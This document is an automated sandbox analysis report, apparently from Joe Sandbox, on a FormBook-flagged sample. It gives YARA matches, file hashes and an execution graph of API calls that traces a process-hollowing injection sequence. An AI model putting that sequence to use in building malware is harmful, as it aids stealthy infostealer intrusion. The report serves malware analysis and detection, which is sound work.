                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:24
                                                                                                                                                                          Start time:08:45:22
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                          Imagebase:0x7ff722870000
                                                                                                                                                                          File size:676'768 bytes
                                                                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:11.1%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:13.3%
                                                                                                                                                                            Total number of Nodes:376
                                                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                                                            execution_graph 53128 7866946 53133 7867186 53128->53133 53151 7867120 53128->53151 53168 7867110 53128->53168 53129 786695c 53134 7867189 53133->53134 53135 7867114 53133->53135 53134->53129 53143 7867142 53135->53143 53185 7867686 53135->53185 53190 7867859 53135->53190 53195 7867778 53135->53195 53200 7867bb3 53135->53200 53204 7867832 53135->53204 53209 78678f2 53135->53209 53215 78679b4 53135->53215 53227 7867a94 53135->53227 53231 786770b 53135->53231 53236 78678ca 53135->53236 53241 7867c8c 53135->53241 53247 786756f 53135->53247 53252 7867ba0 53135->53252 53257 7867940 53135->53257 53143->53129 53152 786713a 53151->53152 53153 7867142 53152->53153 53154 7867686 2 API calls 53152->53154 53155 7867940 4 API calls 53152->53155 53156 7867ba0 2 API calls 53152->53156 53157 786756f 2 API calls 53152->53157 53158 7867c8c 2 API calls 53152->53158 53159 78678ca 2 API calls 53152->53159 53160 786770b 2 API calls 53152->53160 53161 7867a94 2 API calls 53152->53161 53162 78679b4 4 API calls 53152->53162 53163 78678f2 2 API calls 53152->53163 53164 7867832 2 API calls 53152->53164 53165 7867bb3 2 API calls 53152->53165 53166 7867778 2 API calls 53152->53166 53167 7867859 2 API calls 53152->53167 53153->53129 53154->53153 53155->53153 53156->53153 53157->53153 53158->53153 53159->53153 53160->53153 53161->53153 53162->53153 53163->53153 53164->53153 53165->53153 53166->53153 53167->53153 53169 7867114 53168->53169 53170 7867142 53169->53170 53171 7867686 2 API calls 53169->53171 53172 7867940 4 API calls 53169->53172 53173 7867ba0 2 API calls 53169->53173 53174 786756f 2 API calls 53169->53174 53175 7867c8c 2 API calls 53169->53175 53176 78678ca 2 API calls 53169->53176 53177 786770b 2 API calls 53169->53177 53178 7867a94 2 API calls 53169->53178 53179 78679b4 4 API calls 53169->53179 53180 78678f2 2 API calls 53169->53180 53181 7867832 2 API calls 53169->53181 53182 7867bb3 2 API calls 53169->53182 53183 7867778 2 API calls 53169->53183 53184 7867859 2 API calls 53169->53184 53170->53129 53171->53170 53172->53170 53173->53170 53174->53170 53175->53170 53176->53170 53177->53170 53178->53170 53179->53170 53180->53170 53181->53170 53182->53170 53183->53170 53184->53170 53186 786768c 53185->53186 53271 7865a00 53186->53271 53275 7865a08 53186->53275 53187 78677a8 53187->53143 53187->53187 53191 786785f 53190->53191 53279 7865c50 53191->53279 53283 7865c49 53191->53283 53192 7867898 53192->53143 53196 7867782 53195->53196 53198 7865a00 ResumeThread 53196->53198 53199 7865a08 ResumeThread 53196->53199 53197 78677a8 53197->53143 53198->53197 53199->53197 53287 7865d40 53200->53287 53291 7865d38 53200->53291 53201 7867bd5 53205 7867e75 53204->53205 53206 786783f 53204->53206 53295 7865ab0 53205->53295 53299 7865ab8 53205->53299 53210 7867877 53209->53210 53211 7867c14 53210->53211 53213 7865c50 WriteProcessMemory 53210->53213 53214 7865c49 WriteProcessMemory 53210->53214 53211->53143 53212 7867898 53212->53143 53213->53212 53214->53212 53217 786795e 53215->53217 53216 78679be 53303 7865b90 53216->53303 53307 7865b88 53216->53307 53217->53215 53217->53216 53223 7865c50 WriteProcessMemory 53217->53223 53224 7865c49 WriteProcessMemory 53217->53224 53218 7867877 53219 7867c14 53218->53219 53225 7865c50 WriteProcessMemory 53218->53225 53226 7865c49 WriteProcessMemory 53218->53226 53219->53143 53220 7867898 53220->53143 53223->53217 53224->53217 53225->53220 53226->53220 53229 7865ab0 Wow64SetThreadContext 53227->53229 53230 7865ab8 Wow64SetThreadContext 53227->53230 53228 7867aae 53228->53143 53229->53228 53230->53228 53232 7867fa9 53231->53232 53311 7865e20 53232->53311 53315 7865e18 53232->53315 53233 7867fbd 53237 78678d3 53236->53237 53239 7865c50 WriteProcessMemory 53237->53239 53240 7865c49 WriteProcessMemory 53237->53240 53238 7867ae4 53238->53143 53239->53238 53240->53238 53242 786769d 53241->53242 53243 7867c99 53241->53243 53245 7865a00 ResumeThread 53242->53245 53246 7865a08 ResumeThread 53242->53246 53244 78677a8 53244->53143 53245->53244 53246->53244 53248 7867582 53247->53248 53319 78662cc 53248->53319 53323 78662d8 53248->53323 53253 7867793 53252->53253 53254 78677a8 53252->53254 53255 7865a00 ResumeThread 53253->53255 53256 7865a08 ResumeThread 53253->53256 53254->53143 53255->53254 53256->53254 53258 786795e 53257->53258 53265 7865c50 WriteProcessMemory 53257->53265 53266 7865c49 WriteProcessMemory 53257->53266 53259 78679be 53258->53259 53267 7865c50 WriteProcessMemory 53258->53267 53268 7865c49 WriteProcessMemory 53258->53268 53269 7865b90 VirtualAllocEx 53259->53269 53270 7865b88 VirtualAllocEx 53259->53270 53260 7867877 53261 7867c14 53260->53261 53263 7865c50 WriteProcessMemory 53260->53263 53264 7865c49 WriteProcessMemory 53260->53264 53261->53143 53262 7867898 53262->53143 53263->53262 53264->53262 53265->53258 53266->53258 53267->53258 53268->53258 53269->53260 53270->53260 53272 7865a08 ResumeThread 53271->53272 53274 7865a79 53272->53274 53274->53187 53276 7865a48 ResumeThread 53275->53276 53278 7865a79 53276->53278 53278->53187 53280 7865c98 WriteProcessMemory 53279->53280 53282 7865cef 53280->53282 53282->53192 53284 7865c50 WriteProcessMemory 53283->53284 53286 7865cef 53284->53286 53286->53192 53288 7865d8b ReadProcessMemory 53287->53288 53290 7865dcf 53288->53290 53290->53201 53292 7865d8b ReadProcessMemory 53291->53292 53294 7865dcf 53292->53294 53294->53201 53296 7865afd Wow64SetThreadContext 53295->53296 53298 7865b45 53296->53298 53298->53206 53300 7865afd Wow64SetThreadContext 53299->53300 53302 7865b45 53300->53302 53302->53206 53304 7865bd0 VirtualAllocEx 53303->53304 53306 7865c0d 53304->53306 53306->53218 53308 7865bd0 VirtualAllocEx 53307->53308 53310 7865c0d 53308->53310 53310->53218 53312 7865e60 NtUnmapViewOfSection 53311->53312 53314 7865e94 53312->53314 53314->53233 53316 7865e20 NtUnmapViewOfSection 53315->53316 53318 7865e94 53316->53318 53318->53233 53320 7866361 CreateProcessA 53319->53320 53322 7866523 53320->53322 53324 7866361 CreateProcessA 53323->53324 53326 7866523 53324->53326 52916 58a0508 52920 18b921e 52916->52920 52928 18b71bc 52916->52928 52917 58a051b 52922 18b9221 52920->52922 52921 18b91b8 52922->52921 52924 18b94eb 52922->52924 52935 18bbb98 52922->52935 52923 18b9529 52923->52917 52924->52923 52939 18bdc88 52924->52939 52944 18bdc98 52924->52944 52929 18b71c7 52928->52929 52931 18b94eb 52929->52931 52934 18bbb98 2 API calls 52929->52934 52930 18b9529 52930->52917 52931->52930 52932 18bdc88 2 API calls 52931->52932 52933 18bdc98 2 API calls 52931->52933 52932->52930 52933->52930 52934->52931 52949 18bbbbf 52935->52949 52953 18bbbd0 52935->52953 52936 18bbbae 52936->52924 52940 18bdc98 52939->52940 52941 18bdcdd 52940->52941 52976 18bde38 52940->52976 52980 18bde48 52940->52980 52941->52923 52946 18bdc9d 52944->52946 52945 18bdcdd 52945->52923 52946->52945 52947 18bde38 2 API calls 52946->52947 52948 18bde48 2 API calls 52946->52948 52947->52945 52948->52945 52950 18bbbd0 52949->52950 52956 18bbcb8 52950->52956 52951 18bbbdf 52951->52936 52955 18bbcb8 2 API calls 52953->52955 52954 18bbbdf 52954->52936 52955->52954 52957 18bbcd9 52956->52957 52958 18bbcfc 52956->52958 52957->52958 52964 18bbf50 52957->52964 52968 18bbf60 52957->52968 52958->52951 52959 18bbcf4 52959->52958 52960 18bbf00 GetModuleHandleW 52959->52960 52961 18bbf2d 52960->52961 52961->52951 52966 18bbf60 52964->52966 52965 18bbf99 52965->52959 52966->52965 52972 18bb6c8 52966->52972 52969 18bbf65 52968->52969 52970 18bb6c8 LoadLibraryExW 52969->52970 52971 18bbf99 52969->52971 52970->52971 52971->52959 52973 18bc140 LoadLibraryExW 52972->52973 52975 18bc1b9 52973->52975 52975->52965 52977 18bde48 52976->52977 52979 18bde8f 52977->52979 52984 18bda28 52977->52984 52979->52941 52981 18bde4d 52980->52981 52982 18bde8f 52981->52982 52983 18bda28 2 API calls 52981->52983 52982->52941 52983->52982 52985 18bda2d 52984->52985 52987 18be7a0 52985->52987 52988 18bdb54 52985->52988 52987->52987 52989 18bdb5f 52988->52989 52990 18b71bc 2 API calls 52989->52990 52991 18be80f 52990->52991 52991->52987 53334 18b4668 53335 18b467a 53334->53335 53339 18b4686 53335->53339 53340 18b4779 53335->53340 53337 18b46a5 53345 18b3e30 53339->53345 53341 18b479d 53340->53341 53349 18b4877 53341->53349 53353 18b4888 53341->53353 53346 18b3e3b 53345->53346 53361 18b5c4c 53346->53361 53348 18b765f 53348->53337 53350 18b4887 53349->53350 53351 18b498c 53350->53351 53357 18b4538 53350->53357 53354 18b48af 53353->53354 53355 18b4538 CreateActCtxA 53354->53355 53356 18b498c 53354->53356 53355->53356 53358 18b5d18 CreateActCtxA 53357->53358 53360 18b5ddb 53358->53360 53360->53360 53362 18b5c57 53361->53362 53365 18b715c 53362->53365 53364 18b7f2d 53364->53348 53366 18b7167 53365->53366 53369 18b718c 53366->53369 53368 18b8002 53368->53364 53370 18b7197 53369->53370 53371 18b71bc 2 API calls 53370->53371 53372 18b8105 53371->53372 53372->53368 53327 7869650 53328 7869676 53327->53328 53329 78697db 53327->53329 53328->53329 53331 7865fc8 53328->53331 53332 78698d0 PostMessageW 53331->53332 53333 786993c 53332->53333 53333->53328 53373 18bdf60 53374 18bdf65 53373->53374 53378 18be130 53374->53378 53382 18be140 53374->53382 53375 18be093 53379 18be140 53378->53379 53385 18bdaf0 53379->53385 53383 18bdaf0 DuplicateHandle 53382->53383 53384 18be16e 53383->53384 53384->53375 53386 18be1a8 DuplicateHandle 53385->53386 53388 18be16e 53386->53388 53388->53375 53056 57c98d0 53057 57c98fd 53056->53057 53098 57c9450 53057->53098 53059 57c995d 53103 57c9470 53059->53103 53062 57c9470 2 API calls 53063 57c99d8 53062->53063 53107 57c9490 53063->53107 53065 57c9a30 53066 57c9490 2 API calls 53065->53066 53067 57c9a62 53066->53067 53068 57c9490 2 API calls 53067->53068 53069 57c9a94 53068->53069 53070 57c9490 2 API calls 53069->53070 53071 57c9ac6 53070->53071 53072 57c9490 2 API calls 53071->53072 53073 57c9af8 53072->53073 53074 57c9470 2 API calls 53073->53074 53075 57c9b5c 53074->53075 53076 57c9470 2 API calls 53075->53076 53077 57c9bc0 53076->53077 53078 57c9470 2 API calls 53077->53078 53079 57c9cef 53078->53079 53080 57c9470 2 API calls 53079->53080 53081 57c9e18 53080->53081 53082 57c9470 2 API calls 53081->53082 53083 57c9e47 53082->53083 53084 57c9470 2 API calls 53083->53084 53085 57c9f73 53084->53085 53086 57c9470 2 API calls 53085->53086 53087 57c9fd7 53086->53087 53088 57c9470 2 API calls 53087->53088 53089 57ca06d 53088->53089 53090 57c9470 2 API calls 53089->53090 53091 57ca103 53090->53091 53092 57c9470 2 API calls 53091->53092 53093 57ca135 53092->53093 53094 57c9470 2 API calls 53093->53094 53095 57ca261 53094->53095 53096 57c9470 2 API calls 53095->53096 53097 57ca293 53096->53097 53099 57c945b 53098->53099 53101 18b921e 2 API calls 53099->53101 53102 18b71bc 2 API calls 53099->53102 53100 57ced4f 53100->53059 53101->53100 53102->53100 53104 57c947b 53103->53104 53111 57c9788 53104->53111 53106 57c99af 53106->53062 53108 57c949b 53107->53108 53109 57c9788 2 API calls 53108->53109 53110 57cfceb 53109->53110 53110->53065 53112 57c9793 53111->53112 53114 18b921e 2 API calls 53112->53114 53115 18b71bc 2 API calls 53112->53115 53113 57cf54c 53113->53106 53114->53113 53115->53113 53121 57c27c0 53124 57c1c70 53121->53124 53125 57c2810 CreateWindowExW 53124->53125 53127 57c2934 53125->53127 52992 182d01c 52993 182d034 52992->52993 52994 182d08e 52993->52994 52999 57c1c9c 52993->52999 53008 57c29b7 52993->53008 53012 57c3728 52993->53012 53021 57c29c8 52993->53021 53000 57c1ca7 52999->53000 53001 57c3799 53000->53001 53004 57c3789 53000->53004 53041 57c1dc4 53001->53041 53003 57c3797 53025 57c398c 53004->53025 53031 57c38b0 53004->53031 53036 57c38c0 53004->53036 53009 57c29ee 53008->53009 53010 57c1c9c CallWindowProcW 53009->53010 53011 57c2a0f 53010->53011 53011->52994 53015 57c3765 53012->53015 53013 57c3799 53014 57c1dc4 CallWindowProcW 53013->53014 53016 57c3797 53014->53016 53015->53013 53017 57c3789 53015->53017 53018 57c398c CallWindowProcW 53017->53018 53019 57c38c0 CallWindowProcW 53017->53019 53020 57c38b0 CallWindowProcW 53017->53020 53018->53016 53019->53016 53020->53016 53022 57c29ee 53021->53022 53023 57c1c9c CallWindowProcW 53022->53023 53024 57c2a0f 53023->53024 53024->52994 53026 57c394a 53025->53026 53027 57c399a 53025->53027 53045 57c3978 53026->53045 53048 57c3967 53026->53048 53028 57c3960 53028->53003 53033 57c38d4 53031->53033 53032 57c3960 53032->53003 53034 57c3978 CallWindowProcW 53033->53034 53035 57c3967 CallWindowProcW 53033->53035 53034->53032 53035->53032 53038 57c38d4 53036->53038 53037 57c3960 53037->53003 53039 57c3978 CallWindowProcW 53038->53039 53040 57c3967 CallWindowProcW 53038->53040 53039->53037 53040->53037 53042 57c1dc9 53041->53042 53043 57c4e7a CallWindowProcW 53042->53043 53044 57c4e29 53042->53044 53043->53044 53044->53003 53046 57c3989 53045->53046 53051 57c4cc4 53045->53051 53046->53028 53049 57c3989 53048->53049 53050 57c4cc4 CallWindowProcW 53048->53050 53049->53028 53050->53049 53053 57c4ccc 53051->53053 53052 57c4d30 53052->53046 53053->53052 53054 57c1dc4 CallWindowProcW 53053->53054 53055 57c4dca 53054->53055 53055->53046 53116 7869da8 53117 7869fe3 53116->53117 53118 7869dd0 53116->53118 53118->53117 53119 786a1e5 KiUserExceptionDispatcher 53118->53119 53120 786a20c 53119->53120

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 057C98D0 Relevance: 6.0, Strings: 1, Instructions: 4786COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 57c98d0-57c98fb 1 57c98fd 0->1 2 57c9902-57c9c19 call 57c9450 call 57c9460 call 57c9470 * 2 call 57c9480 call 57c9490 * 5 call 57c94a0 call 57c9470 call 57c9480 call 57c9470 call 57c94bc 0->2 1->2 1159 57c9c1f call 58af938 2->1159 1160 57c9c1f call 58af948 2->1160 68 57c9c25-57cb764 call 57c9480 call 57c9470 call 57c94bc call 57c9460 call 57c9470 * 2 call 57c94bc call 57c9460 call 57c9480 call 57c94bc call 57c94a0 call 57c9470 call 57c94a0 call 57c9470 call 57c94cc * 2 call 57c9470 call 57c9460 call 57c9480 call 57c9470 * 2 call 57c94cc * 2 call 57c94a0 * 2 call 57c9480 call 57c9470 * 2 call 57c94cc * 2 call 57c94a0 * 2 call 57c94dc * 4 call 57c94ec call 57c94fc call 57c950c call 57c951c call 57c952c call 57c953c call 57c94dc * 5 call 57c954c call 57c94fc call 57c955c call 57c951c call 57c956c call 57c957c call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 7 call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 2 1157 57cb767 call 58a9bcb 68->1157 1158 57cb767 call 58a9bd8 68->1158 477 57cb76a-57cd3d9 call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c95cc call 57c95dc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94dc * 2 call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c95cc call 57c95dc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94dc * 3 call 57c954c call 57c94fc call 57c955c call 57c951c call 57c956c call 57c957c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c95cc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95ec call 57c94dc * 2 call 57c954c call 57c94fc call 57c951c call 57c956c call 57c957c call 57c94dc * 7 call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c95cc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95ec call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc 835 57cd4b9-57cd4d2 477->835 836 57cd3de-57cd3f7 835->836 837 57cd4d8-57cda0d call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 2 call 57c954c call 57c94fc call 57c951c call 57c956c call 57c957c call 57c94dc * 6 call 57c94ec call 57c94fc call 57c951c 835->837 838 57cd3fe-57cd40c 836->838 839 57cd3f9 836->839 913 57cda0f 837->913 914 57cda14-57cda34 837->914 841 57cd415-57cd435 838->841 839->838 843 57cd43c-57cd454 841->843 844 57cd437 841->844 846 57cd45b-57cd4a4 843->846 847 57cd456 843->847 844->843 852 57cd4ab-57cd4b8 846->852 853 57cd4a6 846->853 847->846 852->835 853->852 913->914 916 57cda3b-57cda8f 914->916 917 57cda36 914->917 920 57cda96-57cdaaf 916->920 921 57cda91 916->921 917->916 923 57cdab6-57cdaf7 920->923 924 57cdab1 920->924 921->920 927 57cdafe-57cec79 call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94dc * 6 call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95fc call 57c960c call 57c94dc call 57c961c call 57c962c call 57c94fc call 57c963c call 57c964c call 57c965c * 4 923->927 924->923 1157->477 1158->477 1159->68 1160->68
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Nq
                                                                                                                                                                            • API String ID: 0-1575210091
                                                                                                                                                                            • Opcode ID: e5b7eaab06e8c0ce0f8a96721812820544d913dcdc9c7000ce11d336609fe558
                                                                                                                                                                            • Instruction ID: 0b31b0be0f36a9dbd389909a52cc50d21fb7b523af0d1f15cbb18b026bb858c9
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b7eaab06e8c0ce0f8a96721812820544d913dcdc9c7000ce11d336609fe558
                                                                                                                                                                            • Instruction Fuzzy Hash: CBB3B634A11219CFCB64DB24C898A99B7B6FF8A315F1141E9D50DAB761DB32AEC1CF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C98C0 Relevance: 6.0, Strings: 1, Instructions: 4735COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1161 57c98c0-57c98fb 1163 57c98fd 1161->1163 1164 57c9902-57c9948 1161->1164 1163->1164 1169 57c9952-57c9958 call 57c9450 1164->1169 1171 57c995d-57c999a call 57c9460 1169->1171 1177 57c99a4-57c99aa call 57c9470 1171->1177 1179 57c99af-57c9a15 call 57c9470 call 57c9480 1177->1179 1189 57c9a1f-57c9a2b call 57c9490 1179->1189 1191 57c9a30-57c9b0f call 57c9490 * 4 1189->1191 1209 57c9b19-57c9b25 call 57c94a0 1191->1209 1211 57c9b2a-57c9bd7 call 57c9470 call 57c9480 call 57c9470 1209->1211 1225 57c9be1-57c9bed call 57c94bc 1211->1225 1227 57c9bf2-57c9c09 1225->1227 1229 57c9c13-57c9c19 1227->1229 2321 57c9c1f call 58af938 1229->2321 2322 57c9c1f call 58af948 1229->2322 1230 57c9c25-57ca4b4 call 57c9480 call 57c9470 call 57c94bc call 57c9460 call 57c9470 * 2 call 57c94bc call 57c9460 call 57c9480 call 57c94bc call 57c94a0 call 57c9470 call 57c94a0 call 57c9470 call 57c94cc * 2 call 57c9470 call 57c9460 call 57c9480 call 57c9470 * 2 call 57c94cc * 2 call 57c94a0 * 2 call 57c9480 call 57c9470 * 2 call 57c94cc * 2 call 57c94a0 * 2 call 57c94dc 1392 57ca4b9-57ca4cd 1230->1392 1393 57ca4d3-57ca69e call 57c94dc * 3 call 57c94ec call 57c94fc call 57c950c call 57c951c call 57c952c call 57c953c call 57c94dc 1392->1393 1421 57ca6a3-57ca6bd 1393->1421 1422 57ca6c3-57ca892 call 57c94dc * 4 call 57c954c call 57c94fc call 57c955c 1421->1422 1443 57ca89c-57ca8b6 call 57c951c 1422->1443 1445 57ca8bb-57cb497 call 57c956c call 57c957c call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 7 call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac 1443->1445 1604 57cb49c-57cb4b0 1445->1604 1605 57cb4b6-57cb745 call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 2 1604->1605 1638 57cb74a-57cb764 1605->1638 2319 57cb767 call 58a9bcb 1638->2319 2320 57cb767 call 58a9bd8 1638->2320 1639 57cb76a-57cb9dd call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac 1671 57cb9e2-57cb9f6 call 57c95cc 1639->1671 1673 57cb9fb-57cba71 call 57c95dc 1671->1673 1679 57cba7b-57cba89 1673->1679 1680 57cba8f-57cbb26 call 57c94ec call 57c94fc 1679->1680 1686 57cbb30-57cbb4a call 57c951c 1680->1686 1688 57cbb4f-57cbb63 call 57c952c 1686->1688 1690 57cbb68-57cbb96 1688->1690 1692 57cbb9e-57cbcd5 call 57c94dc * 2 call 57c958c call 57c94ec 1690->1692 1707 57cbcda-57cbcef call 57c94fc 1692->1707 1709 57cbcf4-57cd3d9 call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c95cc call 57c95dc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94dc * 3 call 57c954c call 57c94fc call 57c955c call 57c951c call 57c956c call 57c957c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c95cc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95ec call 57c94dc * 2 call 57c954c call 57c94fc call 57c951c call 57c956c call 57c957c call 57c94dc * 7 call 57c958c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c95cc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95ec call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc 1707->1709 1997 57cd4b9-57cd4d2 1709->1997 1998 57cd3de-57cd3f7 1997->1998 1999 57cd4d8-57cd9a9 call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 2 call 57c954c call 57c94fc call 57c951c call 57c956c call 57c957c call 57c94dc * 6 call 57c94ec call 57c94fc call 57c951c 1997->1999 2000 57cd3fe-57cd40c 1998->2000 2001 57cd3f9 1998->2001 2071 57cd9b0-57cd9ce 1999->2071 2003 57cd415-57cd435 2000->2003 2001->2000 2005 57cd43c-57cd454 2003->2005 2006 57cd437 2003->2006 2008 57cd45b-57cd4a4 2005->2008 2009 57cd456 2005->2009 2006->2005 2014 57cd4ab-57cd4b8 2008->2014 2015 57cd4a6 2008->2015 2009->2008 2014->1997 2015->2014 2072 57cd9d9-57cd9e5 2071->2072 2073 57cd9ef-57cd9f7 2072->2073 2074 57cd9fd-57cda0d 2073->2074 2075 57cda0f 2074->2075 2076 57cda14-57cda34 2074->2076 2075->2076 2078 57cda3b-57cda8f 2076->2078 2079 57cda36 2076->2079 2082 57cda96-57cdaaf 2078->2082 2083 57cda91 2078->2083 2079->2078 2085 57cdab6-57cdad5 2082->2085 2086 57cdab1 2082->2086 2083->2082 2088 57cdadf-57cdaf7 2085->2088 2086->2085 2089 57cdafe-57cec79 call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94dc * 6 call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95fc call 57c960c call 57c94dc call 57c961c call 57c962c call 57c94fc call 57c963c call 57c964c call 57c965c * 4 2088->2089 2319->1639 2320->1639 2321->1230 2322->1230
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
